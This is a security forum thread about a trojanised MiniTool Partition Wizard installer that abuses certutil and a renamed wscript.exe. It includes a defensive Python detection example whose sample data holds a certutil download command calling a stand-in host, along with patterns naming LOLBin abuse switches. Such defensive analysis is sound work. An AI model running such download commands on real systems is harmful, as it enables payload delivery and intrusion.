Tzatz (Posted November 10, 2021, edited November 10, 2021):
Eset never detected this virus embedded in Minitool... a malicious script is dropped by a compromised Minitool Partition Wizard. Files attached. I created a custom HIPS rule to detect files dropped into the \roaming\ws folder, hoping one day I would find the culprit; it paid off:
Continued: from: MiniTool Partition Wizard 12.zip
itman (Posted November 10, 2021, edited November 10, 2021):
Yes, a bit of disappointment since there was a lengthy posting back in July in the forum on this Win "living off the land" binary abuse. Since you didn't post all Hybrid-Analysis details on this specific attack, here they are: https://www.hybrid-analysis.com/sample/e0f8a75737f932454aa9a325d35a7abc837fd05c23b5a5d1360d6ba1a6fb6479/60fbc6767746783ee4496bf6
BTW - OSArmor will protect against this specific Win LOL binary abuse since it specifically monitors for CertUtil execution with a command string attached. Ditto for all other known Win LOL binary abuse attack methods.
itman (Posted November 10, 2021, edited November 10, 2021):
Another clever element of this attack is that the malware is bundled with the Minitool Partition Wizard .exe installer. It is not unusual for installers to create files in the %Temp% and/or %AppData% directories and execute them. As such, if one was monitoring these directories for process startup activities via Eset HIPS rules, it could be assumed any such created processes would be allowed to run. Also, Eset HIPS recommended anti-ransomware rules would not have prevented the renamed wscript.exe, i.e. ws.exe, from running from the %Temp% directory. This again highlights that the Eset HIPS should be monitoring the .exe PE header name and provide global wildcard capability, e.g. *\wscript.exe, to block startup from any directory location.
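As an added illustration of the detection gap itman describes (this is example code written for this thread, not ESET, OSArmor or MiniTool code), the logic below keys on the PE OriginalFileName rather than the on-disk name, so a wscript.exe renamed to ws.exe and launched from a Roaming folder still matches, and it separately flags certutil invoked with download/decode switches. The event records are constructed in the shape of Sysmon Event ID 1 fields and are assumptions, not data from the thread.

```python
import ntpath
import re

# Constructed sample events shaped like Sysmon Event ID 1 fields; made up here,
# not thread data. Event 0 mirrors the renamed wscript.exe (ws.exe) under Roaming.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Roaming\ws\ws.exe",
     "OriginalFileName": "wscript.exe",
     "CommandLine": r'"C:\Users\u\AppData\Roaming\ws\ws.exe" loader.js'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -split -f http://example.invalid/p.txt p.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -verify cert.cer"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "wscript.exe",
     "CommandLine": r"wscript.exe C:\Scripts\logon.vbs"},
]

# LOLBins keyed by PE OriginalFileName, not on-disk name: the "*\wscript.exe"
# wildcard effect itman asks for, unaffected by a rename such as ws.exe.
WATCHED = {"wscript.exe", "cscript.exe", "certutil.exe"}
# Installer-style drop locations a script host should not be launched from.
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp)\\", re.IGNORECASE)
# certutil switches that turn it into a downloader/decoder (per LOLBAS).
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)

def evaluate(event):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    image = event.get("Image", "")
    original = event.get("OriginalFileName", "").lower()
    if original in WATCHED:
        if ntpath.basename(image).lower() != original:
            hits.append("renamed_lolbin")  # file name disagrees with PE name
        if USER_WRITABLE.search(image):
            hits.append("lolbin_in_user_writable_dir")
    if original == "certutil.exe" and CERTUTIL_ABUSE.search(event.get("CommandLine", "")):
        hits.append("certutil_download_or_decode")
    return hits

def scan(events):
    """Return (Image, fired rules) for each event that triggers at least one rule."""
    findings = []
    for event in events:
        hits = evaluate(event)
        if hits:
            findings.append((event["Image"], hits))
    return findings
```

The two benign records (certutil -verify, wscript.exe from System32) are there to show the rules stay quiet on ordinary use.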
itman (Posted November 10, 2021, edited November 11, 2021):
A few more comments. I went to the MiniTool Partition Wizard vendor's web site and downloaded the free version. The download was named pw1205-demo.exe. Next, the download was signed with a Sectigo code-signing certificate. However, the file listed on VirusTotal is named PartitionWizard.exe, and it is unsigned. Obviously, the malicious version of this software is not a legit version of MiniTool Partition Wizard.
Nightowl, Most Valued Members (Posted November 14, 2021):
On 11/10/2021 at 6:23 PM, itman said:
BTW - OSArmor will protect against this specific Win LOL binary abuse since it specifically monitors for CertUtil execution with a command string attached. Ditto for all other known Win LOL binary abuse attack methods.
Does that work like AppArmor in Linux? And have you tested it with ESET?
itman (Posted November 14, 2021):
2 hours ago, Nightowl said:
Does that work like AppArmor in Linux? And have you tested it with ESET?
Refer to this for what the software does: https://www.osarmor.com/ . Also, there are threads for software use and support on both wilderssecurity.com and malwaretips.com where it is quite popular. And yes, I run OSArmor concurrently with EIS with no conflicts. I do exclude Eset files and processes from OSArmor. But no exclusions for it in Eset.
NewbyUser, ESET Insiders (Posted November 15, 2021):
On 11/10/2021 at 10:23 AM, itman said:
Yes, a bit of disappointment since there was a lengthy posting back in July in the forum on this Win "living off the land" binary abuse. Since you didn't post all Hybrid-Analysis details on this specific attack, here they are: https://www.hybrid-analysis.com/sample/e0f8a75737f932454aa9a325d35a7abc837fd05c23b5a5d1360d6ba1a6fb6479/60fbc6767746783ee4496bf6 BTW - OSArmor will protect against this specific Win LOL binary abuse since it specifically monitors for CertUtil execution with a command string attached. Ditto for all other known Win LOL binary abuse attack methods.
Interesting article on the issue of LOLs. https://www.darkreading.com/threat-intelligence/open-source-project-aims-to-detect-living-off-the-land-attacks
itman (Posted November 15, 2021, edited November 15, 2021):
11 hours ago, NewbyUser said:
Interesting article on the issue of LOLs. https://www.darkreading.com/threat-intelligence/open-source-project-aims-to-detect-living-off-the-land-attacks
Appears this tool is designed to be used in final verdict rendering by a human after a suspicious detection has been received from the AV solution:
Quote: "Adobe's tool is best-suited for working with security log data, but it can work on any source of flat log data that follow the same patterns, such as authentication logs, Web server logs, and access logs, Adobe stated." https://www.darkreading.com/threat-intelligence/adobe-open-sources-tool-for-anomaly-research
This is applicable to EDTD where suspicious verdicts are returned to the originating source. Such is not the case for LiveGuard.
BTW - Microsoft is also starting to use like ML analysis: https://www.darkreading.com/analytics/microsoft-uses-machine-learning-to-predict-attackers-next-steps/d/d-id/1340642 . Again, this appears to be to inform an installation that they are being attacked so they can implement defensive measures against it.
itman (Posted November 15, 2021):
BTW - since we have mentioned Windows "living off the land" binaries that can be abused, here's a list of them along with associated MITRE ATT&CK® techniques: https://lolbas-project.github.io/#